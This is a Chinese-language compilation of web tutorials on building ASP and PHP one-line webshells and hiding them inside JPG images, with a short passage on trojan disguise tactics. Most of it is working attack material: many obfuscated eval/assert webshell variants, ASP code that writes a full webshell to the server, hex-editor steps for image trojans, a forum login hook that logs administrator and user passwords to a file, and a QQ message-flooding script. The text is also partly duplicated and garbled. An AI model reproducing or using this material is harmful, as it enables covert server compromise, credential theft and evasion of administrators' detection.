一句话木马图片制作(三种方法)

合集下载

一句话木马

一句话木马
Source line: execute request("nettoo")
Description: 类型不匹配: 'execute'
这个如何解决呢?
想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了!
一句话木马大全:
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
文件中,写入结束后使用set iP=nothing 释放对方 然后使用response.redirect "aoyunwan.asp" 转向写入的文件,就是我们最后见的大马了!
关于服务器错误
经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
Script error detected at line 1.
</script>
<%ExecuteGlobal request(chr(35))%> 9月30日
<%eval request("#")%>
数据库里插入
┼攠数畣整爠焕敌瑳∨∣┩忾
utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
iP.Close
set iP=nothing
response.redirect "aoyunwan.asp"
学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用对象中的writetext方法将 request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea域中的内容,也就是我们的大马的代码)写入服务端 的 aoyunwan.asp

木马的常用伪装手段

木马的常用伪装手段

木马的常用伪装手段在网络安全领域,木马是一种恶意软件,可以在不被用户察觉的情况下悄悄地进入计算机系统,实现盗取用户信息、破坏系统的行为。

因此,木马程序的伪装手段非常重要,可以使其更容易地潜入计算机系统。

以下是一些常用的木马伪装手段:1. 伪装成正常程序许多木马程序被设计成伪装成常见的软件或系统组件,例如浏览器插件、媒体播放器、下载器等,以此混淆用户的视觉,避免受到用户的怀疑,从而更容易渗透进入用户的系统。

2. 终端木马伪装终端木马常被伪装成程序源码、编译工具或其它网络安全工具来骗取用户信任,而终端木马常常伴随着对受害者机器的远程控制,拥有非常广泛的攻击能力。

3. 使用非常规的文件扩展名很多木马程序使用并不常见的文件扩展名,比如".txt"、".jpg"、".pdf"等,以绕过一些计算机安全防护软件的检测。

在实际应用过程中,我们应该避免打开不熟悉的文件。

4. 嵌入宏或脚本很多木马程序将自己嵌入到宏或脚本中,然后利用漏洞自动执行,从而绕过了常规的安全检测。

例如,利用办公软件(Word、Excel等)中的宏病毒的攻击方式。

5. 嵌入加密模块有些木马程序会嵌入加密模块,使得其内容在传输过程中无法被轻易识别和拦截,从而达到对计算机系统的“偷窃”。

综上所述,木马程序有很多伪装手段,其中有些是非常难以被发现的。

因此,我们需要时刻保持警惕,使用网络安全软件来防范这些木马程序的攻击,同时也需要提高自己的网络安全意识,确保个人计算机和重要信息的安全。

除了上述常用的木马伪装手段,还有一些更高级的木马伪装手段。

这些高级伪装手段越来越普遍,它们可以更好地欺骗人们的眼睛和虚拟机器的安全防御。

以下是一些高级木马伪装技术:1. 避免反病毒软件现在的反病毒软件具有越来越高的检测能力,它们能够及时发现木马程序并抵御攻击。

因此,一些高级的木马程序会通过加密自己来避免反病毒软件的检测与抵抗。

PHP8种一句话木马

PHP8种一句话木马

PHP8种⼀句话⽊马⼀句话⽊马书写:为什么是⼀句话⽊马,因为他可以通过函数接收指定的参数来让我们的操作系统执⾏指定的命令 1.eval函数<?php eval($_REQUEST['a]);?> 2.assert函数(php官⽅在php7中更改了assert函数。

在php7.0.29之后的版本不⽀持动态调⽤。

也就是7.0.29之后⽆法执⾏命令)<?php assert($_REQUEST["a"]); ?> 3.匿名⽅法构造<?php func=create_function('',$_POST['a']); func();?> 4.array_map的书写⽅式: <?php$func = $_POST['a'];$arr = array($_POST['b']);news = array_map($func, $arr);?> 5.call_user_func(⽅法名,参数) 把接受的第⼀个值当作回调函数调⽤,其余参数作为回调函数的参数<?php$a = $_GET['a'];call_user_func(assert,$a);//书写为⼀句//call_user_func(assert,$_GET['a']);?> 6.array_filert(⽅法名,数组)<?php//函数过滤器,学过python的⼩伙伴⼀定看的懂,就是将数组中的每个值放到指定的函数中,返回⼀个只含有true的结果,上⽅的array_map也和python的map函数基本相像$arr = array_filert($_GET['func'],array($_GET['a']));?> 7.⽂件操作函数:⽣成⼀个之前的⼀句话⽊马,<?php$test='<?php eval($_POST['a']);?>';file_put_contents('test1.php',$test);//⼀句话的书写⽅式fputs(fopen('a.php','w'),'<?php assert($_POST["a"]?>');?> 8.动态函数调⽤:接收⼀个函数作为函数名,⼀个函数作为参数进⾏动态调⽤<?$_GET['func']($_GET['a']);?>。

一句话木马简介

一句话木马简介

⼀句话⽊马简介⼀句话⽊马的原理即可以执⾏传递上来变量的内容,变量名称即“⼀句话密码”,变量内容即后门执⾏代码,内容可以是list⽂件、上传及下载⽂件、数据库操作等等。

这类后门通常只⼀⾏代码,因此可以随意插⼊web站点的正常⽂件⽽并不影响原本代码的执⾏,甚⾄与正常图⽚的结合可以形成“图⽚马”。

体积⼩,隐蔽性强是⼀句话⽊马最⼤的优势。

灵活的变量内容同时成就了很多经典的⼀句话操作客户端,如菜⼑。

php⽊马剖析我们来对下⾯这样的⼀个⼀句话进⾏简单剖析:<?php eval($_POST['bckdor']);?>这是php的⼀句话后门中最普遍的⼀种。

它的⼯作原理是这样的:⾸先存在⼀个变量,变量名为bckdor,bckdor的取值为HTTP的POST⽅式。

Web服务器对bckdor取值以后,然后通过eval()函数执⾏bckdor⾥⾯的内容。

php⽊马使⽤做⼀个⼀句话⽊马:p.php直接上burp,试⼀个最简单的命令可以看到,uname -a,正常运⾏,且将结果返回回来。

⼀句话的⽆数变种下⾯是⼀些发散思维。

1,可以利⽤preg_replace,当有e修饰符时,可以直接运⾏替换的字符串。

例⼦如下:<?phpsession_start();$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);$_SESSION['theCode']&&preg_replace('\'a\'ei', 'e'.'v'.'a'.'l'.'($_SESSION[\'theCode\'])', 'a');>不过可以看到,连php官⽅都意识到了这⾥存在的漏洞,所以在7.0版本,明确不再⽀持/e修饰符,不过 <7.0 还是存在这个问题的2,利⽤编码,甚⾄迭代编码<?php $f = base64_decode($_GET['g']); $f($_POST['c']); ?>3,利⽤字符的各种颠倒<?php$str = 'aerst';$funct = $str{0}.$str{3}.$str{3}.$str{1}.$str{2}.$str{4};@$func($_POST['c']);>4,字符拼接,编码拼接等等<?php $c=$_GET[n].'t';@$c($_POST[cmd]);?><?php $c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[cmd]);?>有兴趣的还可以再进⼀步研究,下次分析客户端。

一句话木马图片制作(三种方法)重点讲义资料

一句话木马图片制作(三种方法)重点讲义资料

图片木马制作的三种方法Copy命令制作1.asp内容:打开cmd,数据一下命令:此时打开两个jpg文件,相比:且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站,即可按asp执行。

<% #include files=”2.jpg”%>Uedit32(转载):本制作来自于:雪糕。

我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误:Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp,行 3所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码:<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。

制作步骤:一、前期准备材料:1.一张图片:1.jpg2.一句话木马服务器端代码:<%execute request("value")%>(其他的一句话也行)3.一句Script标签:<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码:<!--#include file="图片地址"-->工具:UltraEdit二、开始制作:1.使用UltraEdit打开1.jpg文件,然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25,那么%>就应该是25 3E,但是我们只把25改成00;之后我们在新建一个文本编辑窗口,将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去,然后点击右键选择十六进制编辑命令,这样会跳转到十六进制数据窗口,复制所有的十六进制的数据,粘贴到1.jpg的十六进制编辑窗口的最下面,说明:为什么要粘贴到最下面?假设你把srcipt标签的十六进制代码粘贴到中间的话,就会破坏图片的完整性,那样下面的图片就看不到了,但是插入的一句话代码还是起作用的。

PHP之一句话木马

PHP之一句话木马

PHP之⼀句话⽊马什么是⼀句话⽊马⼀句话⽊马就是只需要⼀⾏代码的⽊马,短短⼀⾏代码,就能做到和⼤马相当的功能。

为了绕过waf的检测,⼀句话⽊马出现了⽆数中变形,但本质是不变的:⽊马的函数执⾏了我们发送的命令。

我们如何发送命令,发送的命令如何执⾏?我们可以通过GET 、POST 、COOKIE这三种⽅式向⼀个⽹站提交数据,⼀句话⽊马⽤$_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据,并把接收的数据传递给⼀句话⽊马中执⾏命令的函数,进⽽执⾏命令。

所以看到的经典⼀句话⽊马⼤多都是只有两个部分,⼀个是可以执⾏代码的函数部分,⼀个是接收数据的部分。

例如:<?php eval(@$_POST['a']); ?>其中eval就是执⾏命令的函数,$_POST['a']就是接收的数据。

eval函数把接收的数据当作PHP代码来执⾏。

这样我们就能够让插⼊了⼀句话⽊马的⽹站执⾏我们传递过去的任意PHP语句。

这便是⼀句话⽊马的强⼤之处。

⽰例:使⽤其他函数制作⼀句话⽊马assert函数<?php assert(@$_POST['a']); ?>create_function函数<?php$fun = create_function('',$_POST['a']);$fun();>把⽤户传递的数据⽣成⼀个函数fun(),然后再执⾏fun()call_user_func回调函数<?php@call_user_func(assert,$_POST['a']);>call_user_func这个函数可以调⽤其它函数,被调⽤的函数是call_user_func的第⼀个函数,被调⽤的函数的参数是call_user_func的第⼆个参数。

图片马制作指导

图片马制作指导

1.名称:自己如何动手制作图片形式的ASP木马(还要可显示图片)建一个asp文件,内容为找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索 shell代码插在这里,最好是小马,还要加密一下访问的时候在你作手脚的asp文件后面加上?action=ok,即可 (2)另一种方法,在我们要做手脚的asp文件里加入如下内容访问的时候在做手脚的asp文件后面加上?filer=XXX XXX 为你本地上传的一个路径如 c:ating123.asp 上传后在做手脚的asp的同文件夹中有ating,asp (3)前提得到system权限,进入网站目录下一层 mkdir s… copy ating.asp s…/ 这样杀毒软件找不到的访问http://网站/s…/ating.asp即可 6. 工具/chaojiyonghu.rar,此工具在该电脑生成一个超级用户用户名为:hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的. 7.名称:QQ群脚本攻击打开qq对话诓,复制消息,然后下面的内容保存为.vbs 文件,运行即可 Set WshShell= WScript.createobject("WScript.Shell") WshShell.AppActivate "QQ信息攻击脚本" for i=1 to 20 WScript.Sleep 1000 WshShell.SendKeys"^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next 8.搜索:程序制作:万鹏有免费申请空间的,直接上传asp马即可 9. 名称:全面找出你站上的ASP木马(1)用杀毒软件(2)用FTP客户端软件,点"工具"->"比较文件夹" (3)用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马(4)用工具Beyond Compare 10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样老办法: 修改admin_login.asp得到明文DVBBS后台密码在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.createObject("Scripting.FileSystemObject") set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台,在目录下就生成了laner.txt (2)login.asp中Case "login_chk"下: on error resume next Dim rain set rain=server.createobject("adodb.stream") rain.Type=2 rain.CharSet="gb2312" rain.Position=rain.Size rain.Open rain.LoadFromFile server.MapPath("laner.asp") rain.writetext now&request("username")&"text:"&request("password")&chr(10) rain.SaveToFile server.MapPath("laner.asp"),2 rain.Close set rain=nothing 这样laner.asp将获得全部登陆人的登陆时间,用户名和密码(3)如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: 11. 名称:利用QQ在线状态抓鸽子肉鸡生成qq在线状态,把里面的地址改成木马地址,发到论坛在login.asp那里插入一句: response.write""response.write"" 结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里 12. 动画名称:媒体中国整站程序存在多处漏洞漏洞程序:媒体中国整站程序(第一版) 官方网站:/ 漏洞: %5c(暴库) 上传注入上传页面:down1/upload.asp 13. 名称:免费电话+MSH命令行工具 / 打开主页,点击坐下角,Free DownLoad,下载到本地,安装,运行后,会提示正在寻找你所在地区的区号。

一句话木马图片制作(三种方法)

一句话木马图片制作(三种方法)

图片木马制作的三种方法Copy命令制作1.asp内容:打开cmd,数据一下命令:此时打开两个jpg文件,相比:且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站,即可按asp执行。

<% #include files=”2.jpg”%>Uedit32(转载):本制作来自于:雪糕。

我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误:Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp,行 3所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码:<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。

制作步骤:一、前期准备材料:1.一张图片:1.jpg2.一句话木马服务器端代码:<%execute request("value")%>(其他的一句话也行)3.一句Script标签:<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码:<!--#include file="图片地址"-->工具:UltraEdit二、开始制作:1.使用UltraEdit打开1.jpg文件,然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25,那么%>就应该是25 3E,但是我们只把25改成00;之后我们在新建一个文本编辑窗口,将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去,然后点击右键选择十六进制编辑命令,这样会跳转到十六进制数据窗口,复制所有的十六进制的数据,粘贴到1.jpg的十六进制编辑窗口的最下面,说明:为什么要粘贴到最下面?假设你把srcipt标签的十六进制代码粘贴到中间的话,就会破坏图片的完整性,那样下面的图片就看不到了,但是插入的一句话代码还是起作用的。

一句话木马的使用

一句话木马的使用
Step1 暴库得到数据库路径
以“”为例。在浏览器中打开“/join/listall.asp?bid=2”,将地址栏中join后的/改为%5c,在提交后的返回返回信息中可以看到网站数据库地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,数据库文件名中加入了“#”符号,“#”符号在IE中执行时被解释为中断符,要访问该数据库文件则必须将“#”号变为“23%”才可以。因此数据库文件的实际WEB地址为“/join/admin/adshuilonG!%23).asp”
//获取系统启动后经过的毫秒数
qTick = Environment.TickCount;
//计算得到系统启动后经过的分钟数
qTick /= 60000;
最后只需要用蓝屏木马连接数据库文件“/join/admin/adshuilonG!%23).asp”,然后上传ASP木马就可以控制该网站的服务器了。
“一句话木马”的防范
要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了。
在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了。
实例二 “社区超市”入侵动网论坛
Step1 检测入侵条件
以入侵论坛“/”为例。首先在浏览器地址栏中输入“/data/shop.asp”,回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息。说明该论坛的社区超市数据库文件没有改名或删除,可以进行入侵。

各种一句话木马大全

各种一句话木马大全

各种⼀句话⽊马⼤全<%eval request("c")%><%execute request("c")%><%execute(request("c"))%><%ExecuteGlobal request("sb")%>%><%Eval(Request(chr(35)))%><%<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%><%eval(Request.Item["c"],"unsafe");%>'备份专⽤<%eval(request("c")):response.end%>'⽆防下载表,有防下载表突破专⽤⼀句话<%execute request("c")%><%<%loop<%:%><%<%loop<%:%><%execute request("c")%><%execute request("c")<%loop<%:%>'防杀防扫专⽤<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>'不⽤"<,>"<script language=VBScript runat=server>execute request("c")</script><% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我⼀声⽼⼤'};lcx.性别((lcx.名字)+'') %><script language=vbs runat=server>eval(request("c"))</script><script language=vbs runat=server>eval_r(request("c"))</script>'不⽤双引号<%eval request(chr(35))%>'可以躲过雷客图<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") nguage="VBScript"ms.AddObject"response",response ms.AddObject"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%><%dy=request("dy")%><%Eval(dy)%>'容错代码if Request("sb")<>"" then ExecuteGlobal request("sb") end ifPHP⼀句话复制代码代码如下:<?php eval($_POST1);?><?php if(isset($_POST['c'])){eval($_POST['c']);}?><?php system($_REQUEST1);?><?php ($_=@$_GET1).@$_($_POST1)?><?php eval_r($_POST1)?><?php @eval_r($_POST1)?>//容错代码<?php assert($_POST1);?>//使⽤Lanker⼀句话客户端的专家模式执⾏相关的PHP语句<?$_POST['c']($_POST['cc']);?><?$_POST['c']($_POST['cc'],$_POST['cc'])?><?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使⽤这个后,使⽤菜⼑⼀句话客户端在配置连接的时候在"配置"⼀栏输⼊*/:<O>h=@eval_r($_POST1);</O><?php echo `$_GET['r']` ?>//绕过<?限制的⼀句话<script language="php">@eval_r($_POST[sb])</script>JSP⼀句话复制代码代码如下:<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>提交客户端<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>ASPX⼀句话<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script> 再补充⼏个:推荐还是把⼀句话加进图⽚⾥⾯去。

一句话木马记录

一句话木马记录

⼀句话⽊马记录1、asp⼀句话⽊马:<%eval request(“x”)%>2、php⼀句话⽊马:<?php eval($_POST[g]);?>3、aspx⼀句话:<%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%>4、数据库加密⼀句话(密码a):┼攠数畣整爠焕敌瑳∨≡┩忾5、⽹站配置、版权信息专⽤⼀句话:”%><%Eval Request(x)%>6、⼀句话再过护卫神:<%Y=request(“x”)%> <%execute(Y)%>7、过拦截⼀句话⽊马:<% eXEcGlOBaL ReQuEsT(“x”) %>8、asp闭合型⼀句话:%><%eval request(“0o1Znz1ow”)%><%9、能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg http://www.toreadsafe.xyz10、突破安全狗的⼀句话:<%Y=request(“x”)%> <%eval(Y)%>11、elong过安全狗的php⼀句话:<?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[cc]); ?>12、突破护卫神,保护盾⼀句话:<?php $a = str_replace(x,”",”axsxxsxexrxxt”);$a($_POST["test"]); ?>13、⾼强度php⼀句话:<?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?>14、后台常⽤写⼊php⼀句话(密码x):<?$fp = @fopen(“c.php”, ‘a’);f@fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”);@fclose($fp);>15、许多⽹页程序都不允许包含〈%%〉标记符号的内容的⽂件上传,这样⼀句话⽊马就写⼊不进数据库了。

Java中JS引擎实现的一句话木马

Java中JS引擎实现的一句话木马

Java中JS引擎实现的⼀句话⽊马⽬录前⾔基本原理获取脚本引擎绑定对象eval基本语法调⽤Java⽅法导⼊Java类型创建Java类型的数组导⼊Java类⽅法调⽤与重载Payload结构设计语法问题的坑两种语⾔对象间的相互转换Rhino/Nashorn解析的差异反射的坑保底操作测试最后前⾔⼀直以来,Java⼀句话⽊马都是采⽤打⼊字节码defineClass实现的。

这种⽅法的优势是可以完整的打进去⼀个类,可以⼏乎实现Java上的所有功能。

不⾜之处就是Payload过于巨⼤,并且不像脚本语⾔⼀样⽅便修改。

并且还存在很多特征,例如继承ClassLoader,反射调⽤defineClass等。

本在这⾥提出⼀种Java⼀句话⽊马:利⽤Java中JS引擎实现的⼀句话⽊马。

基本原理1. Java没有eval函数,Js有eval函数,可以把字符串当代码解析。

2. Java从1.6开始⾃带ScriptEngineManager这个类,原⽣⽀持调⽤js,⽆需安装第三⽅库。

3. ScriptEngine⽀持在Js中调⽤Java的对象综上所述,我们可以利⽤Java调⽤JS引擎的eval,然后在Payload中反过来调⽤Java对象,这就是本⽂提出的新型Java⼀句话的核⼼原理。

ScriptEngineManager全名javax.script.ScriptEngineManager,从Java 6开始⾃带。

其中Java 6/7采⽤的js解析引擎是Rhino,⽽从java8开始换成了Nashorn。

不同解析引擎对同样的代码有⼀些差别,这点后⾯有所体现。

如果说原理其实⼀两句话就可以说清楚,但是难点在于Payload的编写。

跨语⾔调⽤最⼤的⼀个难点就是数据类型以及⽅法的转换。

例如Java中有byte数组,Js中没有怎么办?C++⾥有指针但是Java⾥没有这个玩意怎么办?在实现期间踩了很多的坑,这篇⽂章跟⼤家⼀起掰扯掰扯,希望能给⼤家提供点帮助。

一句话木马的原理及利用

一句话木马的原理及利用

一句话木马的原理及利用(asp,aspx,php,jsp)一句话木马的适用环境:1.服务器的来宾账户有写入权限2.已知数据库地址且数据库格式为asa或asp3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可一句话木马的工作原理:"一句话木马"服务端(本地的html提交文件)就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为<%execute request("value")%> 其中value可以自己修改"一句话木马"客户端(远程服务器上被插入一句话的asp文件)用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件现在先假设在远程主机的TEXT.ASP(客户端)中已经有了<%execute request("value")%>这个语句.)在ASP里<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)<form action=http://主机路径/TEXT.asp method=post><textarea name=value cols=120 rows=10 width=45>set lP=server.createObject("Adodb.Stream")//建立流对象lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("newvalue")lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆盖的方式lP.Close //关闭对象set lP=nothing //释放对象response.redirect "newmm.asp" //转向newmm.asp</textarea><textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br><input type=submit value=提交></form>表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的V ALUE一样,就是我用蓝色标记的那两处,必须相等)说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.具体的就是下面这一段:set lP=server.createObject("Adodb.Stream")//建立流对象lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("newvalue")lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆盖的方式lP.Close //关闭对象set lP=nothing //释放对象response.redirect "newmm.asp" //转向newmm.asp这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。

另类网站入侵之一句话木马图片的妙用

另类网站入侵之一句话木马图片的妙用

另类⽹站⼊侵之⼀句话⽊马图⽚的妙⽤这篇⽂章有点标题党了,⼀句话⽊马⼤家都不陌⽣,我想很多菜菜都体验过他的强⼤之处吧。

提起⼀句话我们不由得想起了laker⼤侠啊。

可以说laker⼤侠的⼀句话⽊马真是为我们⼴⼤脚本⼊侵者带来不少的⽅便。

今天我要讲述的这个⼊侵过程就和⼀句话⽊马密不可分,说到这⼤家应该都知道最终拿下这个站的的⽅法肯定是利⽤⼀句话了。

不过这个站我还是费了好⼤周折才成功拿下⼀句话的。

下⾯让我们⼀起回顾下整个过程吧。

不会熟练使⽤⼀句话的⼩菜们可要认真看了,能熟练运⽤⼀句话的⼤虾们也不要骄傲,说不定下⾯的⽅法就是你没有尝试过的哦。

好了,事情起因还是以⼩菜拿到了⽹站后台没法拿webshell,找我求助来了,我们还是先到⽹站后台看看到底是什么样⼀个状况吧。

⽹址我就不发出来了,免得有些⼈品不好的⼩菜们拿去搞破坏。

是⼀个什么电⼦商城的后台,不过我之前在前台看了下给⼈的感觉就是不怎么样,刚那⼩菜应该就是通过注⼊漏洞拿到的账号和密码。

⼤约在后台看了下基本情况,寻找可利⽤的信息,有⼀个ewebeditor的编辑器,不过貌似是2.16以上版本的,不存在注⼊漏洞;另外有⼀个图⽚上传的功能;还有⼀个数据库备份恢复功能,⼤致这些地⽅都是可以利⽤的。

不过ewebeditor我已经尝试了,默认登录界⾯删除,数据库名称更改不可下载。

admin_style.asp⽂件验证⽅式独⽴,没有与主站后台使⽤同⼀种验证,有的⽹站的ewebeditor的后台验证与⽹站后台⼀直,这就导致登录⽹站后台后就可以直接访问编辑器后台程序。

另外就是数据库备份,⼤家可以看下图:可见该备份功能不可⾃定义源数据库路径名称及备份致的数数据库路径或名称,不过当时看到这⾥我⼼理⾯有了⼀个想法就是既然不可以⾃⼰定义路径及名称,我可以⾃⼰抓包然后更改数据库后提交。

这个⽅法我以前在其他⽹站上有试过,⽽且成功过。

主要就是针对类似的数据库备份功能,使⽤抓包⼯具抓下来然后更改后再⽤NC提交。

炫酷摩斯密码效果制作教程

炫酷摩斯密码效果制作教程

炫酷摩斯密码效果制作教程摩斯密码是一种用不同长度的信号来表示字母和数字的编码系统,被广泛应用于通信和密码学领域。

在设计中,我们可以使用PhotoShop 软件来制作一个炫酷的摩斯密码效果,让文字变成摩斯密码的形式。

步骤一:创建新文档首先,在PhotoShop中打开一个新文档。

选择适合的画布尺寸,并选择适当的分辨率。

通常,选择较大的分辨率会产生更清晰的效果。

步骤二:选择背景颜色根据你的设计需求,选择一个适合的背景颜色。

你可以使用Paint Bucket工具将画布填充为你喜欢的任何颜色。

步骤三:添加文本图层使用Type工具在画布上添加一个文本图层。

选择一个适合的字体和大小,以及你想要显示的文本内容。

步骤四:文本样式设置选中文本图层,在Photoshop工具栏中找到文本样式选项。

点击打开文本样式面板,选择一个适合的样式,如倾斜、加粗、下划线等。

步骤五:创建摩斯密码样式在层面板上,将文本图层复制一份,并将副本图层重命名为“摩斯密码图层”。

然后,在摩斯密码图层上应用下列效果:内外发光、渐变叠加、描边,以及刻画等效果,可以根据个人喜好进行调整。

这些效果将使文本看起来像是由摩斯码点和划组成的。

步骤六:制作摩斯密码效果打开一个新的文档,并创建一个透明图层。

使用直线工具或铅笔工具在透明图层上绘制摩斯码的点和划。

在摩斯密码中,点用于表示字母和数字的频繁信号,划用于表示字母和数字的稀有信号。

根据所需的内容,绘制正确的摩斯代码。

步骤七:复制并粘贴摩斯码在摩斯码文档上,使用选择工具选中你创建的所有摩斯码,并复制它们。

然后回到主设计文档,粘贴你复制的摩斯码。

根据需要调整摩斯码的大小和位置。

步骤八:应用摩斯密码图层遮罩选中摩斯密码图层,在图层面板上点击添加图层蒙版按钮。

这将会在图层上创建一个蒙版。

然后,使用黑色画笔在蒙版上涂抹,以隐藏摩斯码之外的部分。

通过调整画笔的不透明度和硬度,可以创建出各种不同的效果。

步骤九:调整透明度和颜色根据你的设计需求,可以调整摩斯密码图层的透明度和颜色。

制作图片木马教程(如何制作图片木马)

制作图片木马教程(如何制作图片木马)

何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行。

然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录。

再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K、XP来说是无能为力了。

